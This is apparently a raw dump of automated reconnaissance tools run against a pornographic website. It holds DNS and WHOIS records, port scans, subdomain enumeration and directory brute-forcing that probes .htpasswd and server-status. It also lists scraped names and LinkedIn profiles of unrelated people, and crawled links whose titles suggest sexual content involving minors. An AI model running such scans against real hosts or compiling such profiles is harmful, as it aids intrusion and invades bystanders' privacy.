####################################################################################################################################### ======================================================================================================================================= Hostname teengirls.top ISP TORAT Private Enterprise Continent Europe Flag NL Country Netherlands Country Code NL Region Provincie Flevoland Local time 27 Aug 2020 04:40 CEST City Dronten Postal Code 8254 IP Address 212.86.108.165 Latitude 52.526 Longitude 5.724 ======================================================================================================================================= ####################################################################################################################################### Target:http://teengirls.top/ IP:212.86.108.165 ####################################################################################################################################### > set type=A > teengirls.top Server: 10.101.0.243 Address: 10.101.0.243#53 Non-authoritative answer: Name: teengirls.top Address: 212.86.108.165 > set type=NS > teengirls.top Server: 10.101.0.243 Address: 10.101.0.243#53 Non-authoritative answer: teengirls.top nameserver = ns1.example.com. teengirls.top nameserver = ns2.example.com. Authoritative answers can be found from: > set type=MX > teengirls.top Server: 10.101.0.243 Address: 10.101.0.243#53 Non-authoritative answer: teengirls.top mail exchanger = 20 mail.teengirls.top. teengirls.top mail exchanger = 10 mail.teengirls.top. Authoritative answers can be found from: > set type=TXT > teengirls.top Server: 10.101.0.243 Address: 10.101.0.243#53 Non-authoritative answer: teengirls.top text = "v=spf1 ip4:212.86.108.165 a mx ~all" Authoritative answers can be found from: > set type=SOA > teengirls.top Server: 10.101.0.243 Address: 10.101.0.243#53 Non-authoritative answer: teengirls.top origin = tinytube.top mail addr = root.example.com serial = 2019121206 refresh = 3600 retry = 3600 expire = 604800 minimum = 86400 Authoritative answers can be found from: > ##################################################################################################################################### ; <<>> DiG 9.16.4-Debian <<>> trace teengirls.top any ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 23385 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;trace. IN A ;; AUTHORITY SECTION: . 1168 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2020082602 1800 900 604800 86400 ;; Query time: 143 msec ;; SERVER: 10.101.0.243#53(10.101.0.243) ;; WHEN: mer aoû 26 22:45:39 EDT 2020 ;; MSG SIZE rcvd: 109 ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17572 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;teengirls.top. IN ANY ;; ANSWER SECTION: teengirls.top. 3555 IN SOA tinytube.top. root.example.com. 2019121206 3600 3600 604800 86400 teengirls.top. 3509 IN NS ns1.example.com. teengirls.top. 3509 IN NS ns2.example.com. ;; Query time: 59 msec ;; SERVER: 10.101.0.243#53(10.101.0.243) ;; WHEN: mer aoû 26 22:45:39 EDT 2020 ;; MSG SIZE rcvd: 139 ##################################################################################################################################### Domain Name: teengirls.top Registry Domain ID: D20191021G10001G_21811053-top Registrar WHOIS Server: Whois.pananames.com Registrar URL: http://pananames.com Updated Date: 2020-01-24T13:12:19Z Creation Date: 2019-10-20T17:44:51Z Registry Expiry Date: 2020-10-20T17:44:51Z Registrar: URL Solutions Inc. Registrar IANA ID: 1449 Registrar Abuse Contact Email: abuse@pananames.com Registrar Abuse Contact Phone: +1.4692250522 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited ###################################################################################################################################### [i] Scanning Site: http://teengirls.top B A S I C I N F O ==================== [+] Site Title: Teen Nude Girls [+] IP address: 212.86.108.165 [+] Web Server: Apache/2.4.25 (Debian) [+] CMS: Could Not Detect [+] Cloudflare: Not Detected [+] Robots File: Could NOT Find robots.txt! W H O I S L O O K U P ======================== error check your api query G E O I P L O O K U P ========================= [i] IP Address: 212.86.108.165 [i] Country: Netherlands [i] State: Provincie Flevoland [i] City: Dronten [i] Latitude: 52.5241 [i] Longitude: 5.7319 H T T P H E A D E R S ======================= [i] HTTP/1.1 200 OK [i] Date: Thu, 27 Aug 2020 02:48:10 GMT [i] Server: Apache/2.4.25 (Debian) [i] Vary: Accept-Encoding [i] Connection: close [i] Content-Type: text/html; charset=UTF-8 D N S L O O K U P =================== A : 212.86.108.165 MX : 10 mail.teengirls.top. MX : 20 mail.teengirls.top. NS : ns1.example.com. NS : ns2.example.com. TXT : "v=spf1 ip4:212.86.108.165 a mx ~all" SOA : tinytube.top. root.example.com. 2019121206 3600 3600 604800 86400 S U B N E T C A L C U L A T I O N ==================================== Address = 212.86.108.165 Network = 212.86.108.165 / 32 Netmask = 255.255.255.255 Broadcast = not needed on Point-to-Point links Wildcard Mask = 0.0.0.0 Hosts Bits = 0 Max. Hosts = 1 (2^0 - 0) Host Range = { 212.86.108.165 - 212.86.108.165 } N M A P P O R T S C A N ============================ Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-27 02:48 UTC Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.081s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp closed telnet 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp open https 3389/tcp closed ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 1.28 seconds S U B - D O M A I N F I N D E R ================================== [i] Total Subdomains Found : 1 [+] Subdomain: www.teengirls.top [-] IP: 212.86.108.165 ##################################################################################################################################### [*] Users found: 181 --------------------- Akilah Blount - Founding President and CEO Alison Springer - Founder Alissa Chavez - CEO Andrea Johnson - Business Office Manager Anea Bogue Angel Gospodarek Anna Kaschel - CareerFoundry Anna Russett Anne Hill - SVP and Chief Human Resources Officer Barbara Rupp Becky Kho - Marketing Manager Blair Massey - Always Looking Your Best Brittany Kurtz - Co-Founder Carla Body - Top model Carlyn Benson Butts - Co- Owner Carolyn Blakeman Cassandra Gaddo Catherine Dee Cathy Standiford - Writer Cher Best - Marketing and Promotions Manager Chloe Kordsiemon Chris Troutman - Commercial Real Estate Attorney Christina Hastings Christy Miller - Director of Development Claretha Best Connor Wotton - Sales Associate DE Edmond - Realtor Danielle Guzman - Global Head of Social Media Dannielle Miller - CEO David Rothfeder - Fraud Analyst Deborah J Emero Dianne Erickson - Buyer Dominique Gharibian - NSW Sales Manager Dr. Cheryl Wood Dr. Renee Neely - Founder Dr. Tangela D. Harris - CEO Eden Kara - Head Trainer at The Rise Movement Eric Shannon - Master Plumber Erica Capozzi Erika Duncan - Community Relations Manager Erin Tillman Eve Poeschl - Director of Solutions Architecture Fashion Designer Fayette Coppock - Founder and Co-Chair Francisca Rodriguez Genevieve W. Gianna Lucas - On Air Announcer Greater Atlanta Area Greater Chicago Area Greater Los Angeles Area Greater Milwaukee Area Greater Minneapolis-St. Paul Area Greater New York City Area Greater St. Louis Area Heather Sudbrock - CEO and Founder of The Girl Lab Herta Feely - Founder Jacqui Letran Jamika M. Lynch - Health Educator Jasmine Deacon - Program Manager Jenni Luke - Vice President Jennifer Leigh Warner Jennifer Lyons Jill McCurdy Jill Wheeler - Owner Jona Moore - Program Manager Judith Kemp - Leader Juli Kaufmann - President June Evans KaiLi Seekamp - College of Marin Kandis Early Katharine McQueen - Founder Kathleen Hassan Kathy Kitchel - Inside Sales Kathy Renaud - Real Estate Specialist Katie McNichol Katie Tucker - Owner and General Contractor Katy Lynch - Co-Founder and Chief Marketing Officer Kendall Cooper - Associate Merchandise Manager Keren Taylor - Community Champion Kerry Green Kim Millman - Attorney Kimberly Keaton Williams Krista Jones - Director of Client Engagements Kristin Monaco - Director of Customer Care Kween Klarke - Substitute Teacher La Tonya Brown - Executive Director LauraLynn Jansen - Executive Director Lauren Salamone Lauren White - Membership Lead - Area 1 Linda Specht Lindsey Hilligoss - Raising Teen Girls Lindsey Kilbride Lizette Lizardi Lori Brasfield - Owner Luke Kasten Luminessa Enjara - Executive Director Lynn Thompson - Membership Area Manager MJ Reale - Philadelphia University Mallun Yen - Founder and Partner Marci Collier Overstreet - Commission Appointee Marci Morgan - Life Coach for Teen Girls and Young Adults Margaret Puissant - PEARLS for Teen Girls Maria Jones - Head Coach Marielle Evertsz Marielle Evertsz - Certified Life Coach for Teen Girls Marquita Curry-Barrett M.A. - Founder Mary Clare Reilley Maura M. Fox - Digital Transformation Megan Gallagher Melissa Fullmer - Research Assistant Melissa Will Michelle A. Hansen - Owner Michelle Lorenzi Michelle Lorenzi - Family Owner Michelle Mattingly - Account Executive Naomi Less Neeta Bhushan Nawalkha - Co-Founder Nerissa Holder Hall - Senior Producer Ninveh Neuman Olga Heckman Originally launched in 1997 it was pioneer in the field and became a top destination for teen girls. The site covered a diverse range of topics Oyin Eyinade Pano Anthos - Managing Director Paola McGarvey Peter Bakalian - Principal Philline Zitin - Co-Chief Diversity and Inclusion Officer Rachel Griffiths - Specialty Sales Manager Rachel Wimberly Robert Battie Rochelle Fritsch Roshni Patel - Internship SANDRA JOSEPH CertEd - Teen Girls Networking CIC Sally Clark - Author Sally Dominguez - Good Design Ambassador Samantha Bates Sara Dunn - Client Engagement Manager Sarah Henderson - Retail Sales Associate Sarah Jo Sautter - Director of Marketing Sarah Kenny Sarah Legband - Owner Shanon Vuckovic - Senior Recruiter Shashita Inamdar - Medical Director Shoshana Weisberg Skye McIntyre-Bolen - Owner Stephanie Brocoum - CMO Susan Friebert - Board Member Tami Overall - Machine Support Supervisor Tamiko Evans Tania James - Housing Provider Network Manager Teen Girls - Misc Tessa Marie Swarthout - Owner Theresa Dzubak - Senior Digital Copywriter Tim Schoonover - Group Counselor Trainee I Tina Collins - Founder ToWanda Bell - Administrative Secretary Todd Kleppin Toni Pearson Tonia Jones - Jordan Brand GM Triska Moosa - Life Coach Trudi Tapscott - CEO of The Model Coaches Vicki King - Senior Buyer Teen Girls Washington D.C. Metro Area Washington DC-Baltimore Area William Best - Director Wolf Loescher - Director of Development Your search Yvette van de Merwe - Fashion Designer Zandra A. Cunningham - CEO Zoree Jones bella woody-scott - Vice President lyeshia Griffin - Butterflies home for teen girls sahar zigdon - Owner samantha McGurk - teen girls helpline counsler [*] Links found: 88 --------------------- https://www.linkedin.com/in/alexis-bottomley-5778b5178 https://www.linkedin.com/in/alissa-chavez-a30556111 https://www.linkedin.com/in/anea-bogue-652b4a31 https://www.linkedin.com/in/annarussett https://www.linkedin.com/in/bella-woody-scott-614b29176 https://www.linkedin.com/in/billschretter https://www.linkedin.com/in/carla-body-8459668a https://www.linkedin.com/in/carolyn-blakeman-96175523 https://www.linkedin.com/in/cathy-standiford-18667713 https://www.linkedin.com/in/cher-best-ba89a47 https://www.linkedin.com/in/chloe-kordsiemon-a2261b73 https://www.linkedin.com/in/christyamiller https://www.linkedin.com/in/claretha-best-6b0a1b71 https://www.linkedin.com/in/copywritercatherine https://www.linkedin.com/in/davidrothfeder https://www.linkedin.com/in/deanabossiointernational https://www.linkedin.com/in/drneetabhushan https://www.linkedin.com/in/eve-poeschl https://www.linkedin.com/in/guzmandanielle https://www.linkedin.com/in/heathersudbrock https://www.linkedin.com/in/iamtangelaharris https://www.linkedin.com/in/jacquiletran https://www.linkedin.com/in/jasmine-deacon-744184198 https://www.linkedin.com/in/jenni-luke https://www.linkedin.com/in/jennifer-leigh-warner-0571073a https://www.linkedin.com/in/jenniferlyonsl3 https://www.linkedin.com/in/jill-mccurdy-7b15125 https://www.linkedin.com/in/jill-wheeler-0a45063b https://www.linkedin.com/in/judith-kemp-66009939 https://www.linkedin.com/in/julikaufmann https://www.linkedin.com/in/june-evans-80445118 https://www.linkedin.com/in/kaili-seekamp https://www.linkedin.com/in/kandisearly https://www.linkedin.com/in/katemayerschoff/de https://www.linkedin.com/in/kathleenhassan https://www.linkedin.com/in/katie-mcnichol-9a1a4a29 https://www.linkedin.com/in/katie-tucker-b29862b https://www.linkedin.com/in/katylynch https://www.linkedin.com/in/kerentaylor https://www.linkedin.com/in/kim-millman-6115321a https://www.linkedin.com/in/krista-jones-3665863 https://www.linkedin.com/in/kween-klarke-0a5b58164 https://www.linkedin.com/in/la-tonya-brown-a4aa9038 https://www.linkedin.com/in/lauralynn-jansen-980b5a15 https://www.linkedin.com/in/lfmcubicle https://www.linkedin.com/in/lindsey-hilligoss-18a606116 https://www.linkedin.com/in/lizette-lizardi-4b6451b2 https://www.linkedin.com/in/lkaspermonarchstaffing https://www.linkedin.com/in/lori-brasfield-27579779 https://www.linkedin.com/in/luke-kasten-33651026 https://www.linkedin.com/in/maggie-briggs-dineen/de https://www.linkedin.com/in/marcimorgan https://www.linkedin.com/in/margaretpuissant https://www.linkedin.com/in/marielleevertsz/xx https://www.linkedin.com/in/marquita-curry-barrett-m-a-5b82751b https://www.linkedin.com/in/melissa-fullmer-18317813a https://www.linkedin.com/in/mjreale https://www.linkedin.com/in/nerissa-holder-hall https://www.linkedin.com/in/ninvehneuman https://www.linkedin.com/in/olga-heckman-465a3421 https://www.linkedin.com/in/paola-mcgarvey-39b077109 https://www.linkedin.com/in/peter-bakalian-6275167 https://www.linkedin.com/in/renee-mcclure-lcsw-26745075 https://www.linkedin.com/in/rlohmann https://www.linkedin.com/in/rmgriffiths89 https://www.linkedin.com/in/robert-battie-50911021 https://www.linkedin.com/in/rochelle-fritsch-b4a49415 https://www.linkedin.com/in/roshni-patel-a7a03418b%3Ftrk%3Dpublic_profile_browsemap_profile-result-card_result-card_full-click https://www.linkedin.com/in/sahar-zigdon-1a655412 https://www.linkedin.com/in/samantha-mcgurk-09a5aa4 https://www.linkedin.com/in/sarah-kenny-0b4a5322 https://www.linkedin.com/in/shashita-inamdar https://www.linkedin.com/in/silbertmichelle https://www.linkedin.com/in/stephaniebrocoum https://www.linkedin.com/in/stephktaylor https://www.linkedin.com/in/t%25E2%2580%2599keyah-bennett-6b74b4177 https://www.linkedin.com/in/tamikoevans https://www.linkedin.com/in/tania-james-8047568 https://www.linkedin.com/in/tessa-marie-swarthout-41649415 https://www.linkedin.com/in/thompsonlynn https://www.linkedin.com/in/tim-schoonover-93a284a4 https://www.linkedin.com/in/toni-pearson-120b56ab https://www.linkedin.com/in/trudi-tapscott-37469212a https://www.linkedin.com/in/whitnee-kieran-546070167 https://www.linkedin.com/in/william-best-2a083969/%257Bcountry%253Dde%252C%2Blanguage%253Dde%257D%3Ftrk%3Dpeople-guest_profile-result-card_result-card_full-click https://www.linkedin.com/in/wloescher https://www.linkedin.com/in/womenatthewell8 https://www.linkedin.com/in/wyjuanaspeaks Searching 0 results. [*] Searching Trello. [*] IPs found: 4 ------------------- 104.18.42.92 104.18.43.92 212.86.108.165 [*] Emails found: 1 ---------------------- pixel-1598496610510976-web-@teengirls.top [*] Hosts found: 14 --------------------- mail.teengirls.top:212.86.108.165 teengirls.top:mail.teengirls.top teengirls.top:212.86.108.165 www.teengirls.top:212.86.108.165 www.teengirls.top:212.86.108.165error input is invalid [*] Trello URLs found: 23 -------------------- https://trello.com/b/2dzw0t7p/sheridan-charles-prep https://trello.com/b/3at46gqv/cowiki-entwicklung https://trello.com/b/bsdcvk27/blog https://trello.com/b/cgmzkjqg/game-reviews-and-production-calendar https://trello.com/b/dtqu6dne/colorado-news https://trello.com/b/gbmwdpoh/cppr-social-media-content-libraries https://trello.com/b/hpugdvea/crime-stuff https://trello.com/b/ivgi5xlt https://trello.com/b/oy7twdpq/you-belong-the-pre-superbowl-retreat-for-teen-girls https://trello.com/b/oyv4mr2h/nude-girl-amateur-video https://trello.com/b/pd5x4wci/leah-quarantine https://trello.com/b/quqhdrov/amateur-teen-big-tits https://trello.com/b/qxzbhs9y/diversity-resources-be-an-ally https://trello.com/b/wmgld4f9/celebrity-girls https://trello.com/c/2ibfdgpp/3-website https://trello.com/c/4joorlui/253-if-you-want-to-adjust-the-channels-demographic-to-attract-primarily-13-17-year-old-females-what-could-you-do-to-shift-this-demog https://trello.com/c/7qk7fqde/100-beauty-tips-for-teen-crossdressers https://trello.com/c/aphdqrib/9-event-schedule https://trello.com/c/icrrm3w7/98-free-tweets https://trello.com/c/j0ctem1d/47-transportation https://trello.com/c/kzjvd0qi/54-housing-venue https://trello.com/c/rktljnto/13-a-hsu-c-j-2013-selling-american-beauty-to-teen-girls-a-content-analysis-of-female-celebrity-advertisements-in-seventeen-advertis https://trello.com/c/v4w3jnqs/49-national-sponsors ##################################################################################################################################### [INFO] ------TARGET info------ [*] TARGET: http://teengirls.top/ [*] TARGET IP: 212.86.108.165 [INFO] NO load balancer detected for teengirls.top... [*] DNS servers: tinytube.top. [*] TARGET server: Apache/2.4.25 (Debian) [*] CC: NL [*] Country: Netherlands [*] RegionCode: FL [*] RegionName: Provincie Flevoland [*] City: Dronten [*] ASN: AS204601 [*] BGP_PREFIX: 212.86.108.0/24 [*] ISP: ON-LINE-DATA Zomro B.V., NL [INFO] DNS enumeration: [*] ftp.teengirls.top 212.86.108.165 [*] mail.teengirls.top 212.86.108.165 [INFO] Possible abuse mails are: [*] abuse@server-panel.net [*] abuse@teengirls.top [INFO] NO PAC (Proxy Auto Configuration) file FOUND [INFO] Starting FUZZing in http://teengirls.top/FUzZzZzZzZz... [INFO] Status code Folders [*] 200 http://teengirls.top/images [ALERT] Look in the source code. It may contain passwords [ALERT] Content in http://teengirls.top/ AND http://www.teengirls.top/ is different [INFO] MD5 for http://teengirls.top/ is: d7546509a5aba038eae6273ab63c4af9 [INFO] MD5 for http://www.teengirls.top/ is: ae4ce1c3832f2c276308b40d4273b35d [INFO] http://teengirls.top/ redirects to http://teengirls.top/ [INFO] http://www.teengirls.top/ redirects to http://www.teengirls.top/ [INFO] Links found from http://teengirls.top/ http://212.86.108.165/: [*] http://ispsystem.com/external/ispmanager.html [*] http://teengirls.top/ [*] http://teengirls.top/content/slider-01/ [*] http://teengirls.top/content/slider-02/ [*] http://teengirls.top/content/slider-03/ [*] http://teengirls.top/content/slider-04/ [*] http://teengirls.top/content/slider-05/ [*] http://teengirls.top/content/slider-06/ [*] http://teengirls.top/content/slider-07/ [*] http://teengirls.top/content/slider-08/ [*] http://teengirls.top/content/slider-09/ [*] http://teengirls.top/content/slider-10/ [*] http://teengirls.top/content/slider-11/ [*] http://teengirls.top/content/slider-12/ [*] http://teengirls.top/content/slider-13/ [*] http://teengirls.top/content/slider-14/ [*] http://teengirls.top/content/slider-15/ [*] http://teengirls.top/content/slider-16/ [*] http://teengirls.top/content/slider-17/ [*] http://teengirls.top/images/big/ [*] http://teengirls.top/index.php [*] http://trade.tinytube.top/ [*] http://www.extremetube.com.spankmasters.com/embed/webcamz-archive-really-hot-beauty-on-her-webcam-amateur-webcams-2867051?utm_campaign=2020-07-28&utm_medium=cpm&utm_source=kewa_mimito-sm [*] http://www.keezmovies.com.spankmasters.com/embed/Gorgeous-Lesbian-Girls-Eaten-Pussy-28104621?utm_campaign=2020-07-28&utm_medium=cpm&utm_source=mimito-sm [*] http://www.keezmovies.com.spankmasters.com/embed/lolitas-england-kety-bradley-2-662810?utm_campaign=2020-07-28&utm_medium=cpm&utm_source=mimito-sm [*] http://www.spankwire.com.spankmasters.com/EmbedPlayer.aspx?ArticleId=5502771&utm_campaign=2020-07-28&utm_medium=cpm&utm_source=mimito-sm cut: intervalle de champ incorrecte Saisissez « cut --help » pour plus d'informations. [INFO] Shodan detected the following opened ports on 212.86.108.165: [*] 1 [*] 123 [*] 143 [*] 21 [*] 214 [*] 22 [*] 25 [*] 4 [*] 443 [*] 465 [*] 53 [*] 587 [*] 8 [*] 993 [*] 995 [INFO] ------VirusTotal SECTION------ [INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address: [INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset: [INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided: [INFO] ------Alexa Rank SECTION------ [INFO] Percent of Visitors Rank in Country: [INFO] Percent of Search Traffic: [INFO] Percent of Unique Visits: [INFO] Total Sites Linking In: [*] Total Sites [INFO] Useful links related to teengirls.top - 212.86.108.165: [*] https://www.virustotal.com/pt/ip-address/212.86.108.165/information/ [*] https://www.hybrid-analysis.com/search?host=212.86.108.165 [*] https://www.shodan.io/host/212.86.108.165 [*] https://www.senderbase.org/lookup/?search_string=212.86.108.165 [*] https://www.alienvault.com/open-threat-exchange/ip/212.86.108.165 [*] http://pastebin.com/search?q=212.86.108.165 [*] http://urlquery.net/search.php?q=212.86.108.165 [*] http://www.alexa.com/siteinfo/teengirls.top [*] http://www.google.com/safebrowsing/diagnostic?site=teengirls.top [*] https://censys.io/ipv4/212.86.108.165 [*] https://www.abuseipdb.com/check/212.86.108.165 [*] https://urlscan.io/search/#212.86.108.165 [*] https://github.com/search?q=212.86.108.165&type=Code [INFO] Useful links related to AS204601 - 212.86.108.0/24: [*] http://www.google.com/safebrowsing/diagnostic?site=AS:204601 [*] https://www.senderbase.org/lookup/?search_string=212.86.108.0/24 [*] http://bgp.he.net/AS204601 [*] https://stat.ripe.net/AS204601 [INFO] Date: 26/08/20 | Time: 22:54:16 [INFO] Total time: 0 minute(s) and 53 second(s) ##################################################################################################################################### [*] Processing domain teengirls.top [*] Using system resolvers ['10.101.0.243'] [+] Getting nameservers [-] Getting nameservers failed [-] Zone transfer failed [+] TXT records found "v=spf1 ip4:212.86.108.165 a mx ~all" [+] MX records found, added to target list 20 mail.teengirls.top. 10 mail.teengirls.top. [*] Scanning teengirls.top for A records 212.86.108.165 - teengirls.top 212.86.108.165 - ftp.teengirls.top 212.86.108.165 - mail.teengirls.top 212.86.108.165 - pop.teengirls.top 212.86.108.165 - smtp.teengirls.top 212.86.108.165 - www.teengirls.top ##################################################################################################################################### [*] Performing TLD Brute force Enumeration against teengirls.top [*] The operation could take up to: 00:01:35 [+] {'type': 'A', 'name': 'teengirls.xxx', 'address': '94.199.249.35'} [+] {'type': 'A', 'name': 'teengirls.xyz', 'address': '5.189.150.192'} [+] {'type': 'A', 'name': 'teengirls.com', 'address': '67.22.32.36'} [+] {'type': 'A', 'name': 'teengirls.net', 'address': '34.102.136.180'} [+] {'type': 'A', 'name': 'teengirls.org', 'address': '69.172.201.153'} [+] {'type': 'A', 'name': 'teengirls.co', 'address': '91.195.241.136'} [+] {'type': 'A', 'name': 'teengirls.pro', 'address': '91.195.241.136'} [+] {'type': 'A', 'name': 'teengirls.top', 'address': '212.86.108.165'} [+] {'type': 'A', 'name': 'teengirls.be', 'address': '198.23.57.183'} [+] {'type': 'A', 'name': 'teengirls.ca', 'address': '158.85.87.76'} [+] {'type': 'A', 'name': 'teengirls.cf', 'address': '195.20.50.84'} [+] {'type': 'A', 'name': 'teengirls.ch', 'address': '91.195.241.136'} [+] {'type': 'A', 'name': 'teengirls.co', 'address': '91.195.241.136'} [+] {'type': 'A', 'name': 'teengirls.cn', 'address': '154.203.154.235'} [+] {'type': 'A', 'name': 'teengirls.de', 'address': '69.172.201.153'} [+] {'type': 'A', 'name': 'teengirls.cz', 'address': '46.28.105.2'} [+] {'type': 'A', 'name': 'teengirls.eu', 'address': '80.92.65.53'} [+] {'type': 'A', 'name': 'teengirls.es', 'address': '184.168.131.241'} [+] {'type': 'A', 'name': 'teengirls.fm', 'address': '198.74.54.240'} [+] {'type': 'A', 'name': 'teengirls.in', 'address': '199.59.242.153'} [+] {'type': 'A', 'name': 'teengirls.it', 'address': '104.247.82.70'} [+] {'type': 'A', 'name': 'teengirls.hu', 'address': '195.56.148.196'} [+] {'type': 'A', 'name': 'teengirls.la', 'address': '173.230.141.80'} [+] {'type': 'A', 'name': 'teengirls.ph', 'address': '45.79.222.138'} [+] {'type': 'A', 'name': 'teengirls.pl', 'address': '54.38.217.147'} [+] {'type': 'A', 'name': 'teengirls.ru', 'address': '31.31.205.163'} [+] {'type': 'A', 'name': 'teengirls.tk', 'address': '66.206.1.2'} [+] {'type': 'AAAA', 'name': 'teengirls.tk', 'address': '2604:4500:9:4::2'} [+] {'type': 'A', 'name': 'teengirls.us', 'address': '184.168.131.241'} [+] {'type': 'A', 'name': 'teengirls.vg', 'address': '88.198.29.97'} [+] {'type': 'A', 'name': 'teengirls.ws', 'address': '64.70.19.203'} [+] {'type': 'A', 'name': 'teengirls.az.org', 'address': '95.211.219.66'} [+] 32 Records Found ##################################################################################################################################### [+] Target : http://teengirls.top [+] IP Address : 212.86.108.165 [+] Headers : [+] Date : Thu, 27 Aug 2020 03:18:00 GMT [+] Server : Apache/2.4.25 (Debian) [+] Vary : Accept-Encoding [+] Content-Encoding : gzip [+] Content-Length : 4518 [+] Keep-Alive : timeout=5, max=100 [+] Connection : Keep-Alive [+] Content-Type : text/html; charset=UTF-8 [!] SSL Certificate Information : [+] countryName : XX [+] commonName : cum4k.xyz [+] localityName : XX [+] organizationName : XX [+] organizationalUnitName : XX [+] stateOrProvinceName : XX [+] emailAddress : webmaster@cum4k.xyz [+] X509v3 Subject Alternative Name : www.cum4k.xyz [+] countryName : XX [+] commonName : cum4k.xyz [+] localityName : XX [+] organizationName : XX [+] organizationalUnitName : XX [+] stateOrProvinceName : XX [+] emailAddress : webmaster@cum4k.xyz [+] X509v3 Subject Alternative Name : www.cum4k.xyz [+] version : 1 [+] serialNumber : 86B89699E3EAAF57 [+] notBefore : Dec 29 16:48:29 2019 GMT [+] notAfter : Dec 28 16:48:29 2020 GMT [!] Whois Lookup : [+] asn_registry : ripencc [+] asn : 204601 [+] asn_cidr : 212.86.108.0/24 [+] asn_country_code : NL [+] asn_date : 1999-11-10 [+] query : 212.86.108.165 [+] cidr : 212.86.108.128/25 [+] name : NET-25-2 [+] handle : MC31466-RIPE [+] range : 212.86.108.128 - 212.86.108.255 [+] country : NL [+] address : Gildenbroederslaan 1 7005 BM Doetinchem NETHERLANDS [+] emails : ['abuse@server-panel.net'] [+] created : 2018-05-08T11:23:51Z [+] updated : 2020-05-22T10:15:55Z [+] cidr : 212.86.108.0/24 [+] range : 212.86.108.0/24 [+] created : 2018-05-08T11:22:31Z [+] updated : 2020-05-22T09:45:17Z [!] Starting DNS Enumeration... [+] teengirls.top. 3599 IN NS ns2.example.com. [+] teengirls.top. 3599 IN NS ns1.example.com. [+] teengirls.top. 3599 IN MX 20 mail.teengirls.top. [+] teengirls.top. 1799 IN SOA tinytube.top. root.example.com. 2019121206 3600 3600 604800 86400 [+] teengirls.top. 3599 IN SOA tinytube.top. root.example.com. 2019121206 3600 3600 604800 86400 [+] teengirls.top. 3599 IN TXT "v=spf1 ip4:212.86.108.165 a mx ~all" [+] teengirls.top. 3599 IN A 212.86.108.165 [+] teengirls.top. 3599 IN MX 10 mail.teengirls.top. [-] DMARC Record Not Found! [!] Starting Sub-Domain Enumeration... [!] Requesting BuffOver [!] Requesting ThreadCrowd [!] Requesting crt.sh [!] Requesting AnubisDB [!] Requesting ThreatMiner [+] Results : [+] mail.teengirls.top [+] 212.86.108.165 [+] www.teengirls.top [+] Total Found : 3 [+] Port : 33434 [+] Timeout : 1.0 [!] Starting UDP Traceroute... HOPS IP HOST 1 10.203.0.1 Unknown 2 212.102.41.254 unn-212-102-41-254.cdn77.com 3 128.241.0.145 ae-33.r10.dllstx09.us.bb.gin.ntt.net 4 129.250.4.83 ae-4.r24.dllstx09.us.bb.gin.ntt.net 5 * * * 6 129.250.2.37 ae-1.r24.asbnva02.us.bb.gin.ntt.net 7 129.250.6.163 ae-2.r25.amstnl02.nl.bb.gin.ntt.net 8 129.250.3.105 ae-1.r04.amstnl02.nl.bb.gin.ntt.net 9 128.241.6.7 ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net 10 89.105.192.233 Vlanif711.zar-dcd.cust.novoserve.com 11 212.86.108.165 tinytube.top [!] Starting Port Scan... [+] Testing Top 1000 Ports... [+] 22 ssh [+] 110 pop3 [+] 25 smtp [+] 21 ftp [+] 80 http [+] 443 https [+] 53 domain [+] 465 submissions [+] 993 imaps [+] 587 submission [+] 143 imap2 [+] 995 pop3s [!] Starting Crawler... [+] Looking for robots.txt........[ Not Found ] [+] Looking for sitemap.xml.......[ Not Found ] [+] Extracting CSS Links..........[ 1 ] [+] Extracting Javascript Links...[ 1 ] [+] Extracting Internal Links.....[ 0 ] [+] Extracting External Links.....[ 5 ] [+] Extracting Images.............[ 20 ] [+] Crawling Sitemaps.............[ 0 ] [+] Crawling Javascripts..........[ 0 ] [!] Requesting Wayback Machine....[ 54 ] [+] Total Unique Links Extracted : 81 [!] Starting Directory Search... [+] Threads : 30 [+] Timeout : 30.0 [+] Wordlist : wordlists/dirb_common.txt [+] Allow Redirects : False [+] SSL Verification : True [+] DNS Servers : 1.1.1.1 [+] Wordlist Size : 4614 [+] File Extensions : [-] Exception : 936 [-] Exception : Connection timeout to host http://teengirls.top/php3 [+] 403 | http://teengirls.top/.hta [+] 403 | http://teengirls.top/.htaccess [+] 403 | http://teengirls.top/.htpasswd [+] 403 | http://teengirls.top/cgi-bin/ [+] 301 | http://teengirls.top/content [+] 301 | http://teengirls.top/css [+] 301 | http://teengirls.top/icon [+] 301 | http://teengirls.top/images [+] 200 | http://teengirls.top/index.php [+] 301 | http://teengirls.top/javascript [+] 403 | http://teengirls.top/server-status [!] Requesting Wayback Machine... [+] Directories Found : 11 [+] Directories Skipped : 4600 [+] Total Requests : 4611 [+] Directories Found on Wayback Machine : 3 ##################################################################################################################################### traceroute to teengirls.top (212.86.108.165), 30 hops max, 60 byte packets 1 10.203.0.1 (10.203.0.1) 60.658 ms 60.657 ms 60.654 ms 2 unn-212-102-41-254.cdn77.com (212.102.41.254) 60.650 ms 60.647 ms 60.645 ms 3 ae-33.r10.dllstx09.us.bb.gin.ntt.net (128.241.0.145) 61.263 ms 61.277 ms 61.953 ms 4 ae-4.r24.dllstx09.us.bb.gin.ntt.net (129.250.4.83) 61.902 ms 62.354 ms 61.913 ms 5 ae-6.r25.asbnva02.us.bb.gin.ntt.net (129.250.5.13) 99.243 ms 99.198 ms 99.226 ms 6 